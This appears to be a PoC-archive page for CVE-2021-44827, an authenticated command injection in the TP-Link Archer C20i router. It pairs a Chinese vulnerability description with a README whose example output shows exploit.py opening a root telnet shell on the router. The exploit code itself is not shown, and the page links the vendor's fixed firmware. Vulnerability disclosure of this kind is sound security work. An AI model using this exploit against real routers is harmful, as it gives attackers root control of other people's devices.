Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2021-44827 PoC — Tp-link Archer C2 操作系统命令注入漏洞

Source
Associated Vulnerability
Title:Tp-link Archer C2 操作系统命令注入漏洞 (CVE-2021-44827)
Description:Tp-link Archer C2是中国普联(Tp-link)公司的一款无线路由器。 TP-Link Archer C20i 0.9.1 3.2 v003a.0 Build 170221 Rel.55462n版本存在安全漏洞,该漏洞源于设备中的HTTP参数X_TP_ExternalIPv6Address 缺少对于用户数据的过滤和转义,允许远程攻击者以 root 权限在路由器上运行任意命令。
Description
A PoC for CVE-2021-44827 - authenticated remote code execution in Tp-link Archer C20i
Readme
# CVE-2021-44827
A PoC for CVE-2021-44827 - authenticated remote code execution in Tp-link Archer C20i

Write-up: [https://full-disclosure.eu/reports/2022/CVE-2021-44827-tplink-authenticated-remote-code-execution.html](https://full-disclosure.eu/reports/2022/CVE-2021-44827-tplink-authenticated-remote-code-execution.html)

# Example

<pre>
$ python exploit.py
[error]0
[error]0
Run post_exploit_cmd
Trying 192.168.0.1...
Connected to 192.168.0.1
Escape character is '^]'

~ #
~ # ls
web      usr      sbin     mnt      lib      dev
var      sys      proc     linuxrc  etc      bin
~ # id
sh: id: not found
~ # uname -a
sh: uname: not found
~ # cat /proc/version
Linux version 2.6.36 (root@localhost.localdomain) (gcc version 4.6.3 (Buildroot 2012.11.1) ) #1 Tue Feb 21 14:47:04 HKT 2017
</pre>

# Fix

Fixed in [https://static.tp-link.com/upload/firmware/2022/202202/20220217/Archer%20C20i(EU)_V1_220107.zip](https://static.tp-link.com/upload/firmware/2022/202202/20220217/Archer%20C20i(EU)_V1_220107.zip)
File Snapshot

[4.0K] /data/pocs/1539a8f67e74c486a45b9ca3348ce3f69b09b536 ├── [1.6K] exploit.py └── [1007] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.